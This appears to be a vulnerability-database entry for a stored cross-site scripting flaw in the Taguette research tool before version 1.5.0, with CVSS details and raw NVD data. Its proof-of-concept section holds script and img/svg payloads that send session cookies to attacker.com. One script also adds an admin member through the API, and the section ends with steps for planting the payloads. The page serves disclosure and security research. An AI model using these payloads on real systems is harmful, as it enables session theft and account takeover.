Security Vulnerability Report
CVE-2025-62528 CVSS 5.4 MEDIUM

CVE-2025-62528

Published: 2025-10-20 20:15:38
Last Modified: 2025-10-30 17:00:09

Description

Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for a project member to put JavaScript in name or description fields which would run on project load. This issue has been patched in version 1.5.0.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:* - VULNERABLE
Taguette < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62528: Taguette Stored XSS PoC -->
<!-- Vulnerability: Project name/description fields lack proper output encoding -->
<!-- Affected: Taguette versions prior to 1.5.0 -->

<!-- Step 1: Attacker (project member) creates or edits a project -->
<!-- Step 2: Inject malicious JavaScript into the project name or description field -->

<!-- PoC Payload 1: Basic cookie stealing via project name -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- PoC Payload 2: Using img tag with onerror handler (for description field) -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- PoC Payload 3: Using SVG with onload event -->
<svg onload="alert('XSS by CVE-2025-62528')">

<!-- PoC Payload 4: Stealing session and performing privileged actions -->
<script>
// Exfiltrate session token
var sessionToken = document.cookie;
// Create a new admin user or modify project settings
fetch('/api/project/1/members', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({email: '[email protected]', role: 'admin'}),
  credentials: 'include'
});
// Send stolen data to attacker server
new Image().src = 'https://attacker.com/log?data=' + btoa(sessionToken);
</script>

<!-- Reproduction Steps: -->
<!-- 1. Log in to Taguette as a regular project member -->
<!-- 2. Navigate to project settings -->
<!-- 3. Set project name or description to one of the payloads above -->
<!-- 4. Wait for project admin or other members to view the project -->
<!-- 5. Malicious script executes automatically in victim's browser -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62528", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:37.723", "lastModified": "2025-10-30T17:00:08.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for a project member to put JavaScript in name or description fields which would run on project load. This issue has been patched in version 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "1B0C60DA-6D8F-4228-9178-BD1B5D53C6F7"}]}]}], "references": [{"url": "https://github.com/remram44/taguette/security/advisories/GHSA-g9qw-g6rv-3889", "source": "[email protected]", 
"tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.com/remram44/taguette/-/issues/330", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}